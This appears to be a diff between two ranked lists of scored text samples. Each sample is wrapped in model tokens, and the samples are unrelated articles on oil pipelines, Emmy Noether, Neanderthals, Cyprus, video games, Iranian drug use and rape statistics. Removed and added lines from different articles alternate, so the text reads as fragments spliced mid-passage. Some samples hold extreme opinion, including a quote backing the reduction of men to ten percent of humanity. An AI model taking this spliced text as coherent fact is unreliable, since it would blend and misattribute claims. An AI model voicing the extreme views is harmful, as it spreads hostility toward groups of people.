2016 -There were two opinions about the security, said the employees. Some saw it as prudent, while others thought it a sign of distrust. There were no reported problems. +According to the Center for Biological Diversity, over the last 27 years there have been close to 8,000 oil spills in the United States alone. That’s “nearly 300 per year on average.” -Once the initial shock passed, Hertz IT employees had to make difficult choices. +If the DAPL were to follow this environmentally destructive trend, there would be far reaching consequences for the Standing Rock Sioux and potentially millions of other Americans. -Employees' severance packages range from four weeks to -================================================================================ -Rank = 56; Score = 292864.0 -<|begin_of_text|>Amalie Emmy Noether[a] ( German: [ˈnøːtɐ]; 23 March 1882 – 14 April 1935) was a German mathematician who made important contributions to abstract algebra and theoretical physics.[1] She invariably used the name "Emmy Noether" in her life and publications.[a] She was described by Pavel Alexandrov, Albert Einstein, Jean Dieudonné, Hermann Weyl and Norbert Wiener as the most important woman in the history of mathematics.[2] As one of the leading mathematicians of her time, she developed the theories of rings, fields, and algebras. In physics, Noether's theorem explains the connection between symmetry and conservation laws.[4] +Missouri Attorney General Chris Koster said it best: “The River provides drinking water for communities, cooling water for power plants, and a low-cost highway for goods and agricultural products.” -Noether was born to a Jewish family in the Franconian town of Erlangen; her father was a mathematician, Max Noether. She originally planned to teach French and English after passing the required examinations, but instead studied mathematics at the University of Erlangen, where her father lectured. After completing her dissertation in 1907 under the supervision of Paul Gordan, she worked at the Mathematical Institute of Erlangen without pay for seven years. At the time, women were largely excluded from academic positions. In 1915, she was invited by David Hilbert and Felix Klein to join the mathematics department at the University of Göttingen, a world-renowned center of mathematical research. The philosophical faculty objected, however, and she spent four years lecturing under Hilbert's name. Her habilitation was approved in 1919, allowing her to obtain the rank of Privatdozent. +Contaminated water from North Dakota has the potential to hit twelve states, all the way to Louisiana, wreaking havoc across America’s heartland. -Noether remained a leading member of the Göttingen mathematics department until 1933; her students were sometimes called the "Noether boys". In 1924, Dutch mathematician B.L. van der Waerden joined her circle and soon became the leading expositor of Noether's ideas: Her work was the foundation for the second volume of his influential 1931 textbook, Moderne Algebra. By the time of her plenary address at the 1932 International Congress of Mathematicians in Zürich, her algebraic acumen was recognized around the world. The following year, Germany's Nazi government dismissed Jews from university positions, and Noether moved to the United States to take up a position at Bryn Mawr College in Pennsylvania. In 1935 she underwent surgery for an ovarian cyst and, despite signs of a recovery, +The negative impact of the DAPL has already started. There are claims that the Army Corps of Engineers–the government body that approved the project– cut corners by failing to consult with the tribe before letting the pipeline developers, Energy Transfer Partners, proceed with construction. A failed lawsuit in early September argued that, in doing so, the Corps ================================================================================ -Rank = 57; Score = 290816.0 -<|begin_of_text|>Neanderthal communities divided some of their tasks according to their sex. This is one of the main conclusions reached by a study performed by the Spanish National Research Council (CSIC), published in the Journal of Human Evolution. This study, which analyzed 99 incisors and canine teeth of 19 individuals from three different sites (El Sidron, in Asturias -- Spain, L'Hortus in France, and Spy in Belgium), reveals that the dental grooves present in the female fossils follow the same pattern, which is different to that found in male individuals. +Rank = 58; Score = 134144.0 +<|begin_of_text|>Cyprus is Turkish, after all. Turks can do whatever they want there. They can even celebrate dropping napalm on Greeks and slaughtering them. -Analyses show that all Neanderthal individuals, regardless of age, had dental grooves. According to Antonio Rosas, CSIC researcher at the Spanish National Museum of Natural Sciences: "This is due to the custom of these societies to use the mouth as a third hand, as in some current populations, for tasks such as preparing the furs or chopping meat, for instance." +Uzay Bulut The writer is a Turkish journalist and political analyst formerly based in Ankara. She now lives in the United States. More from the author ► The writer is a Turkish journalist and political analyst formerly based in Ankara. She now lives in the United States. -Rosas specifies that "what we have now discovered is that the grooves detected in the teeth of adult women are longer than those found in adult men. Therefore we assume that the tasks performed were different." +On August 8, Muslim Turkish Cypriots and illegal settlers from Turkey celebrated the 53rd anniversary of Turkey’s napalm bombing of Greek Cypriot civilians in the Turkish-occupied enclave of Kokkina in Cyprus. Mustafa Akıncı, the president of the self-styled “Turkish Republic of Northern Cyprus” (TRNC), which is recognized only by Turkey, also participated in the celebrations. -Other variables analyzed are the tiny spalls of the teeth enamel. Male individuals show a greater number of nicks in the enamel and dentin of the upper parts, while in female individuals these imperfections appear in the lower parts. +In August 1964, Turkish warplanes dropped napalm bombs on Kokkina in the Tillyria peninsula, hitting residential areas and a hospital, and killing more than 50 people, including 19 civilians. Ten years later, in 1974, Turkey invaded Cyprus and has occupied almost 40 percent of the island ever since. -It is still unclear which activities corresponded to women and which ones to men. However, the authors of the study note that, as in modern hunter-gatherer societies, women may have been responsible for the preparation of furs and the elaboration of garments. Researchers state that the retouching of the edges of stone tools seems to have been a male task. +The Ministry of Foreign Affairs of Greece issued a note of condemnation regarding the celebrations: -Almudena Estalrrich, CSIC researcher at the Spanish National Museum of Natural Sciences, adds: "Nevertheless, we believe that the specialization of labor by sex of the individuals was probably limited to a few tasks, as it is possible that both men and women participated equally in the hunting of big animals." +“We are dismayed to note the celebrations of the Turkish Cypriot leadership, including Mr. Akinci himself, of the 53rd anniversary of the use of chemical weapons and dropping of napalm bombs by the Turkish air force on the Tillyria peninsula. This was the first use of banned chemical weapons in the history of our planet. -Rosas concludes: "The study of Neanderthals has provided numerous discoveries in recent years. We have moved from thinking of them as little evolved beings, to know that they took care of the sick persons, buried their deceased, ate seafood, and even had different physical features than expected: there were redhead individuals, and with light skin and eyes. So far, we thought that the sexual division of labor was typical of sapiens societies, but apparently that's not true -================================================================================ -Rank = 58; Score = 290816.0 -<|begin_of_text|>Japan's efforts to recruit Indian IT engineers won't work. For a simple reason: these engineers are better off at home. +“Today, when the whole planet bows to the victims of wars and such hostile acts, the holding of and participation in such celebrations is an affront to international law, to the memory of the fallen, and to the whole of humanity.” -With the domestic talent pool shrinking, Japan desperately needs foreign talent to fill the gap and revive its ailing economy. Especially IT engineers, where the country is expected to face a shortage of 600,000 positions. +The Republic of Cyprus declared independence in 1960. Afterwards, Turkey escalated its preparations to invade the island, which included but were not limited to establishing a bridgehead at Kokkina in 1964 and smuggling arms and fighters from Turkey into the area in order to strengthen Turkish positions there. -That’s why Tokyo is reaching to Asian countries like India, where it has launched a program called Project Indian Institutes of Technology (PIITs), inviting students from the Indian Institutes of Technology (IIT) to spend their internships at Japanese firms. +According to the High Commission of the Republic of Cyprus in London, -Apparently, Tokyo hopes that some of these Indian engineers will opt to stay with Japanese firms beyond the internship time. +“When in August 1964 the [Cypriot] Government attempted to contain the Kokkina bridgehead, Turkey's air force bombed the National Guard and neighboring Greek villages with napalm and threatened to invade. The other major purpose served by the enclaves was the political and physical separation of the two communities.” -But judging from the overwhelming response to a previous piece of ours on the topic, Asian talent doesn’t seem eager to work in Japan. +Another preparation for +================================================================================ +Rank = 59; Score = 134144.0 +<|begin_of_text|>There is a point to including playable female characters in games. I’m aware that most of the people likely to comment on this article (go ahead and bleat about misandry, you worms; I’ll enjoy a tasty cup of your male tears) don’t see that, but I’m also aware that the vast majority of people who read this article do see it, and won’t bother to leave a comment because what I’m saying in this editorial seems sensible, practical, and non-controversial. Such is the way of the Internet. So I’m not going to bother writing out a lengthy justification of why we genuinely need female characters in video games for the good of the industry financially and artistically; if you honestly can’t understand it, go forth and educate yourself. If you feel that gaming is the one thing remaining to men and girls should stop spoiling it with political correctness, then please go boil your head because I see no point in debating with people incapable of basic logic and lacking humanity. -The problem? Japan isn’t prepared to provide what foreign talent needs — a career, due to the lack of the right “regime,” the socioeconomic conditions and cultural mindset, prevailing in Japanese corporations. +Having taken it as fact that there is a point to including female characters in video games, why on earth are we still hearing excuses for their absence in 2014? Because it is an excuse. There is no reason not to do it. You won’t alienate your existing market by acknowledging the existence of women. You won’t take anything away from your existing market. -In fact, Indians are better off home. New Delhi is better prepared than Tokyo to attract and retain talent. +Yet another clueless wonder is yapping about the absence of the unnecessary from video games:I am a game designer. I am designing and producing a game that does not, and will not, have a single female character in it. This is not because I am misogynistic. This is not because I do not women to play the game. This is because putting women in the game makes no sense, violates the principle of the suspension of disbelief, and will not make the game any better as a game.I am the lead designer of First Sword, a combat management game. The game has orcs and men, elves and dwarves. It has goblins and trolls. But it has no women.Why not? Because the game is a gladiator game. Women cannot credibly fight as gladiators. We don't put women in the game for the same reason we don't put bunny rabbits or children in the game. Putting women in the game would be an act of brutal sadism, an act of barbarism even by pagan Roman standards. While the Romans did occasionally put female gladiators in the arena, they were there as a comedic act. +================================================================================ +Rank = 60; Score = 133120.0 +<|begin_of_text|>Pillars getting in the way of ceiling cables, water pipes clashing with electrical wires - Mr Yip Shaw Chong has seen many such mistakes on construction sites. -That’s one of the key findings of the 2016-17 International Competitiveness report (World Economic Forum), which ranks India 23 in the capacity to attract talent -- well ahead of Japan, which ranks 77. Also, India ranks ahead of Japan in the capacity to retain talent—see table. +Such errors might require cables to be rerouted or walls to be hacked, wasting resources and time and jeopardising the schedules which Mr Yip oversees as senior project manager at Shimizu Corporation's Singapore office. -Country Capacity to attract talent Capacity to retain talent Japan 77 38 India 22 32 +"Traditionally, we had drawings for each trade," he explains, one set of technical drawings showing electrical works, another showing water pipes, another the walls, and so on. -Source: World Economic Forum +"Of course, an experienced guy would be able to layer them together and visualise that they will clash. But, inevitably, somebody misses something, there's a clash on site and somebody has to go and fix it." -Fund/ETF 12-month Performance iShares MSCI Japan (EWJ) 15.07% iShares India (NDY) 20.76 +Today, however, spotting such errors can easily be done by a beginner, or even a computer program. This is thanks to the rise of Building Information Modelling (BIM), a data-heavy virtual 3D-modelling technology that the industry has been increasingly pushed to adopt since the start of the decade. -Source: Yahoo.finance.com 6/30/2017 +Related Story Smart cities, smoother lives through digital connectivity -There are a couple of good explanations for that. Talent is highly mobile. And it goes where growth and opportunity is. In the last couple of decades, India has been growing at near double-digit rates, while Japan has been floundering in the swamp of stagnation. +Since last July, all building plans for new projects with a gross floor area of 5,000 sq m and more have had to be submitted in BIM format for regulatory approval. -Meanwhile, India has been attracting foreign giants, like Amazon, and they have been setting up research centers to tap into the country’s pool of software engineers and programmers, as its own companies continue to internationalize their operations. +The great advantage of BIM software is that it can combine all plans - architectural, engineering, and mechanical and electrical (M&E) - into one integrated model. -So why leaving home to head to Japan?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 59; Score = 290816.0 -<|begin_of_text|>If girls just want to have fun, as Cyndi Lauper belted out in 1983, does that mean boys are serious stoics? Lauper probably wasn't trying to make a sociological statement in her head-bopping anthem, but her lyrics point to a much-debated question about gender differences. In studying the relative happiness of people across the globe, do men and women exhibit distinctive emotional characteristics? In short, is one sex generally happier than the other? +"Before, you looked at the 2D drawings, this floor and this floor, and then you tried to visualise whatever intersections there were," says Mr Yip. "Whereas now, you have a model, so it's easier to see clashes." -It's important to note that evaluating happiness isn't a highly precise scientific undertaking. For one thing, happiness is a subjective term, and there's no universal measurement for it. Though someone smiles on the outside, it doesn't mean that his or her apparent joy reflects internally. Similarly, a lot of studies related to happiness rely on self-reporting. One survey that economists from the Wharton School at the University of Pennsylvania have used simply asks respondents to rate themselves on whether they are "very happy," "pretty happy" or "not happy." The resulting statistics don't take into account the nuances and background information of why and how people scored themselves. +Recent versions of software are even able to automatically spot and highlight these conflicts. -Despite the potential pitfalls of empirical happiness studies, we can draw some conclusions about who the happiest sociological groups of people are. Generally, older people are happier than younger ones. Wealth and good health also give us something to smile about more often. Yet when it comes to the happiness gender gap, things aren't so cut and dried. +NEW WAYS OF SEEING -The 2003 Pew Global Attitudes Project that surveyed 38,000 men and women across 44 countries lends insight into the disparities between male and female happiness. Overall, women scored themselves as more satisfied with their lives than men [source: Pew Research Center]. Moreover, women from certain countries, including Pakistan, Japan and Argentina, appeared significantly happier. The differences between what affects men and women's levels of happiness explains this slight gender gap. Women, for instance, tend to focus on personal and domestic problems, while men concern themselves more with matters outside of the home. +Admittedly, a lot of work must be done upstream to save time on site. -This variation in values is also reflected in how the recent recession has affected people's happiness. According to a Nielson Happiness Survey conducted in 51 countries, men's happiness hasn't weathered the economic storm well since they attach more importance to financial success than women. On the other hand, the women surveyed indicated they appreciated quality relationships above all [source: Reuters]. +Fast Forward series -But women shouldn't start celebrating the good news just yet.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +With Singapore firmly focused on the Future Economy, The Straits Times' series, Fast Forward: Disruption and the Singapore Economy, helps you make sense of the big shifts that will shake up entire sectors, reshape jobs and change lives. Every Saturday for 12 weeks, the paper's journalists will examine a disruptive force, its likely impact on the economy and how soon that will be felt. From robotics, 3D printing and smart buildings to dire demographic trends, the global skills revolution and the Asean growth story. Next week, find out more about green technology and ================================================================================ -Rank = 60; Score = 290816.0 -<|begin_of_text|>Forfeit the playoffs or defy your religious beliefs. That’s the position the Israeli women’s lacrosse team could find itself in at the World Cup going on this week in Oshawa. - -THe Israeli women's lacrosse team has said it will forfeit a playoff game at the World Cup being held in Oshawa this week if that game lands on Saturday, the Sabbath. ( Jay Johnston / Game Day Photography ) +Rank = 61; Score = 132096.0 +<|begin_of_text|>On the right track: DfT appoints two women to directors general job share for Rail Group. Credit: Lynne Cameron/PA -And if they have to play on Saturday — the Shabbat (Sabbath) as the schedule-makers call for — they will forfeit. Even if it’s the gold-medal game. “We all felt the same way,” said attacker Jenna Block. “It was an absolute team consensus we will not play on Shabbat. Competing in the World Cup is very important to all of us, but who we’re representing and who we are comes first and foremost. +The Department for Transport has appointed two women to the civil service's first ever job share at director general level as successors to the DfT's newly appointed permanent secretary. -Article Continued Below +Polly Payne and Ruth Hannant will join the DfT as directors general for the department's Rail Group on 11 December from the Department for Education, filling the position left vacant when Bernadette Kelly was promoted to perm sec in April. -“That’s a sacrifice we’re all willing to make. This is about more than lacrosse. It’s about more than a game.” At 4-0, the Israelis are a bit of Cinderella surprise at the event and face Japan (4-0) on Tuesday. But the way the schedule is shaping up — and a win by Israel on Wednesday is all it will take — the Israeli team will guarantee itself a spot in the top-8. That means they’ll head toward a playoff game Saturday, the final day of the event that will determine final rankings and the gold medal. The team asked for a schedule change, offering three alternatives: Friday, before sundown. +Kelly said the pair would be role models not only for the civil service but also for the rail sector, where women make up just 11% of the workforce and senior leaders are "overwhelmingly male". -Saturday, after sundown. +RELATED CONTENT -Sunday morning. +She told Civil Service World: “I’m proud that the Department for Transport is leading the way with the first job share partnership at this level in government. And I’m especially pleased that we have Polly and Ruth joining us to lead our work on rail. -Article Continued Below +"We are investing in the biggest rail modernisation for over a century, so there’s a huge amount to do." -The Israelis also offered to pay the expenses of any teams out of pocket for the accommodation. Their request was denied by the Federation of International Lacrosse, which set the schedule. Stan Cockerton, president of FIL, said the federation had no problem accommodating the Israelis’ request in setting the schedule for round-robin pool play in ensuring no Saturday games. But he said the playoffs are a different animal, governed by bylaws with a specific timetable for insurance and game times, with 8 p.m. being the latest scheduled start. “We were able to reschedule (the round robin) so we’re not insensitive to the issue,” said Cockerton. “But for this coming Saturday, we have a set format. “We cannot accommodate them.” Israel’s suggested compromises were a no-go because two of them require play after the scheduled end of the tournament and one requires teams -================================================================================ -Rank = 61; Score = 288768.0 -<|begin_of_text|>Greenwashing is out, brownwashing is in. These days, GOP politicians are scrambling to distance themselves from past environment-friendly statements, initiatives, and votes. (Thanks to Grist reader Gary Wockner for naming this trend.) +Kelly was DG for Rail Group from September 2015 to April 2017, when Nick Joyce took the post in an "acting" capacity. -Check out the top 10 offenders. And watch for a lot more Republicans to join the club as we head toward the 2012 election. +Rail Group is responsible for developing strategy and policy for the rail sector, managing expenditure on rail services and infrastructure, and oversees the delivery of rail franchises and major projects – including Crossrail and Thameslink. -Photo: lukexmartin10. Scott Brown +It sponsors British Transport Police, Network Rail, the Office of Rail and Road, the Rail Accidents Investigation Branch and Transport Focus. -U.S. senator from Massachusetts +Payne and Hannant were already in a job-share partnership with each other working on higher education reform in DfE, and have both previously worked for the former Department for Business, Innovation and Skills and theTreasury. Former BIS permanent secretary Martin Donnelly described the pair as an "outstandingly effective job share", during an interview with Civil Service World earlier this year. -Before: “Reducing carbon dioxide emission in Massachusetts has long been a priority of mine,” he said in 2008 when, as a member of the state Senate, he voted in favor of his state joining the Regional Greenhouse Gas Initiative, a carbon-trading initiative in the Northeast. “Passing this legislation is an important step … towards improving our environment.” +DfT said the appointment demonstrated the government's commitment to increasing the number of women working in the rail sector. The Transport Infrastructure Skills Strategy, published in 2015, included an aim for women to make up 20% of DfT's science and technical apprenticeships by 2020, and 50% by 2030. -After: “I think the globe is always heating and cooling. It’s a natural way of ebb and flow. The thing that concerns me lately is some of the information I’ve heard about potential tampering with some of the information,” he said in December 2009, as the “Climategate” faux-scandal was raging. In April 2011, he voted to strip the U.S. EPA of its authority to regulate carbon dioxide.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Kelly added: “Within the DfT we are making progress in encouraging diversity at every level, and earlier this year the department was recognised for our leadership on workplace gender equality by ================================================================================ -Rank = 62; Score = 288768.0 -<|begin_of_text|>FOR ABONNENTER - -Vi deler samfundet op i indvandrere og danskere, men opdelingen skal være mænd og kvinder. +Rank = 62; Score = 132096.0 +<|begin_of_text|>Women in headscarves and men in tatty clothes puff on a glass pipe as smoke swirls around their faces. The pictures published by Iranian media and blogs in recent months are a sign of a new drug epidemic: shishe, or methamphetamine. -Ikke i indvandrere og danskere. Når der tales om problemer i samfundet, så er det problemer blandt den mandlige del af befolkningen. +Shishe means “glass” in Farsi, a reference to the appearance of the drug in some of its purest forms. -Nu er der ikke problemer med alle mænd, ligesom det ikke er alle indvandrere, der er kriminelle og utilpassede. Selv om man nogle gange kan få den opfattelse i pressen, er det selvfølgelig heller ikke alle mænd, der er kriminelle og utilpassede, men det er blandt den mandlige del af befolkningen, de store samfundsmæssige og sociale problemer findes. +In less than a decade, methamphetamine use has skyrocketed in Iran to the point where now about 345,000 Iranians are considered addicts, according to official statistics. -Vi hører ikke om det – det er et usynligt problem – men ja, vi ved da godt at en pædofil er en mand, at voldtægt begås af mænd, men det understreges ikke. +Seizures of methamphetamine soared 128 percent between 2008 and 2012, topping all other countries in the region, according to figures compiled by the United Nations Office on Drugs and Crime. Last year alone, the government of Iran confiscated 3.6 tons of shishe. -En notits fra avisen siger »færre kræves fængslet, antallet af unge indvandrere, der ender i grundlovsforhør, falder«. Hvem er det, der ender i grundlovsforhør? Det er mænd! Uanset hvilken etnisk kategori de tilhører, så er det mænd, det fremhæves bare ikke. Vi hører ikke om det. +A top official from the Iran Drug Control Headquarters said last year that shishe could be found in Tehran in “less than five minutes,” according to the Iranian Students’ News Agency. -Hvad med overskriften fra Politiken tirsdag 29. august: ’Hård kurs mod unge spiller fallit’. Hvem er de unge. Hvis man læser artiklen, fremgår det, at det er unge mænd. Man kan tro, at problemet er blandt alle unge, men det er det ikke, det er unge mænd indsatsen er rettet mod, jo selvfølgelig er der også piger, men de udgør en forsvindende lille del af problemet. +Shishe addicts in Iran are mostly urban, middle class and young, experts say. Notably, there are a large number of women who abuse shishe, too. -Kriminalitet er et kønsbestemt problem, et mandeproblem. En ekstrem mandlig adfærd. +One of the main reasons why shishe use has spread quickly in Iran is a lack of information about the drug, which has led casual users to believe, erroneously, that it is not addictive, experts say. -Der skrives om vold, men det er ikke bare vold, nej det er mænds vold, mænds vold mod kvinder, børn og andre mænd -================================================================================ -Rank = 63; Score = 288768.0 -<|begin_of_text|>Manitoba drivers who hit and kill a cyclist often end up simply paying a fine. +Struggling university students have begun abusing it to stay up longer and try to boost their performance in school. Women have been sold the drug in beauty salons with the promise that it will help them lose weight, according to local media reports. -A Global News investigation found multiple cases where the driver was never criminally charged. Instead the person was charged under the Highway Traffic Act (HTA) and the offence often resulted in a few thousand dollars fine. +“We really had a hard time convincing people that this is addiction,” said Azaraksh Mokri, a psychiatrist who teaches at the Tehran University of Medical Sciences and has dealt extensively with the issue of shishe addiction. -RELATED: 87 year old Winnipeg cyclist identified as victim of Friday’s crash +Opium addiction has long been a problem in Iran partly because of a tolerance for its use even in conservative rural areas, and also because of the country’s long border with Afghanistan, for decades one of the top opium producers. Opium is still the most abused drug in Iran, according to official statistics. -Leslie Freudenberg, 87, was an avid cyclist. But in July 2016, his passion got him killed. Freudenberg was struck by a piece of heavy machinery. +Shishe began to make inroads in the country about a decade ago, luring users who preferred its effects as a stimulant to the more soporific opium, which was seen as a drug of the poor and elderly. -“He was riding his bike down a cyclist pathway and was crossing the street,” his son-in-law, Keith Johnson, told Global News. “A piece of heavy equipment was being transported down the street and didn’t have a full view for the driver. He didn’t even know that he actually hit my father-in-law.” +That shift has been characterized as a change between drugs which are known as sonati, or +================================================================================ +Rank = 63; Score = 132096.0 +<|begin_of_text|>Skip to comments. -Freudenberg was killed instantly. The 34-year-old driver was never charged. Instead, PCL Construction, the company that owned the truck, is going to court for not providing a clear view to the driver. The Manitoba Justice department said the maximum penalty the company will face is a $2,000 fine. +Humanity Should be 10% Male 90% Female (BC Prof Mary Daly) -“I guess the cruel nature of all of that is the fact that the family has never really been given the opportunity for closure at this point,” Johnson said. “We’ve paid the ultimate price in losing a family member that we’ll never get back.” +Posted on by beckett -This scenario – a pedestrian or cyclist is hit and killed and the driver receives a light penalty – is playing out across the country. Global News has spoken to many families from coast to coast who are outraged that careless drivers aren’t facing stiffer fines after hitting and killing their loved ones. +What Is Enlightenment (Susan Bridle): Which brings us to another question I wanted to ask you. Sally Miller Gearhart, in her article "The Future If There Is One Is Female" writes: "At least three further requirements supplement the strategies of environmentalists if we were to create and preserve a less violent world. 1) Every culture must begin to affirm the female future. 2) Species responsibility must be returned to women in every culture. 3) The proportion of men must be reduced to and maintained at approximately ten percent of the human race." What do you think about this statement? -WATCH: Life is cheap: Trudi Mason recounts harrowing story of losing her friend to a pickup truck +Mary Daly: I think it's not a bad idea at all. If life is to survive on this planet, there must be a decontamination of the Earth. I think this will be accompanied by an evolutionary process that will result in a drastic reduction of the population of males. People are afraid to say that kind of stuff anymore. -Trudi Mason of Lethbridge, Alta. was cycling with her best friend when a truck hit the both of them. Mason’s friend died. Mason says the court process ignores the fact a person was killed. +WIE: Yes. I find myself now thinking that's a bit shocking. -The family feels Freudenberg’s death could have been prevented had PCL followed equipment protocol. Instead, the incident happened as the driver was moving the heavy machinery from one end of the street to the other. +MD: Well, it's shocking that it would be shocking. -“Les’ death hasn’t been taken seriously,” Johnson said. “It’s the worst slap in the face that we could ever experience. It just further denies any closure that the family has to put this behind them.” +WIE: So it doesn't sound like your vision of a separate nation for women is something you see as an interim stage that would eventually lead to men and women living together in true equality. -Freudenberg’s tragic death is just one of many similar cases -================================================================================ -Rank = 64; Score = 288768.0 -<|begin_of_text|>Polar bear hairs are hollow to maximize insulating qualities of the animals' fur, as almost every student of the Arctic knows. +MD: No. That's a very old question. I answered that to audiences twenty-five, thirty years ago. I just don't think that way. See, right now, I would be totally joyous to have a great community of women whether men are somewhere out on the periphery or not. I don't have this goal of: "Oh, then we can all get together again!" That doesn't seem to be a very promising future. So why would I think about it? I think it's pretty evident that men are not central to my thought. -But now a set of studies from China shows polar bear hairs are much more than simple tiny tubes. +WIE: I have one last question. At the beginning of this interview, you spoke about the experience of being deeply at one with that which animates all of life. I wanted to ask you what you think about the possibility of becoming identified with that as who one ultimately is, having that as one's ultimate resting place, or ground, so to speak, and where one's gender would no longer be a primary reference point. -Detailed mathematical analysis of the hairs, published in the journal Thermal Science, finds they have complex structures that make them much better insulators than simple hollow hairs would be. +MD: I don't know if that has anything to do with my experience. I have my own experience of oneness. +================================================================================ +Rank = 64; Score = 131072.0 +<|begin_of_text|>What does the word "rape" mean to you? For many reading this post, I suspect, it is a trigger to appalling events in their own lives. Because rape is an everyday crime. By my calculations, roughly 230 people are raped each day in England and Wales. -Microscopic examination of polar bear hairs reveals their interior is a structure of membrane pores, researchers from several Chinese universities have found. The latest analysis finds the pore structure is arranged as a fractal, a series of repeating patterns spun off into smaller dimensions. +Police, this morning, called for specialist units to investigate rape allegations - senior officers are ashamed of a conviction rate they calculate at 6%. "Not good enough" says the Assistant Commissioner of the Metropolitan Police John Yates. -Calculation of the pore structure finds the ratio of its dimensions to be close to a mathematical figure known as the "golden mean," the ideal dimension ratio for an infinitely spiraling fractal, says one study. The dimension ratio of the inner structure of the analyzed polar-bear hair was calculated at 1.625, close to the golden mean, which is also called Phi and is approximately 1.618; the golden mean "must reveal the possible optimal structure of polar bear hairs," the study says. +But analysis of the Home Office data on what they call "intimate violence" suggests the conviction rate is much lower. And the scale of the problem far greater. My source is the Home Office supplement to the British Crime Survey - Homicides, Firearm Offences and Intimate Violence 2006/07 (pdf link). This is a remarkable piece of research in which 13,000 people were asked to fill out an anonymous questionnaire on their experiences of domestic violence, sexual assault and rape. -Though it appears white, polar bear fur is translucent, helping it absorb environmental heat, the study points out. Without the interior pores' fractal arrangement, however, the translucent hair that absorbs light could easily send heat back out into the environment, the study says. +It is an exercise that has been conducted three times now and is backed up by other academic studies. The results are consistent. One in 20 women said they had been raped since they were 16. One in 200 said they had been raped in the previous 12 months. In terms of the population of England and Wales, that suggests 85,000 women are raped each year - 230 a day. And yet the number of men convicted of rape is fewer than 800 a year. So the chance of a victim seeing her attacker jailed is less than one in 100. -A related study, with some of the same co-authors, calculates the equation for one-dimensional heat conduction through each "labyrinth cavity" of the hair. The authors used calculus to arrive at a differential equation showing how heat moves through the hairs. +But rape is a complex crime. 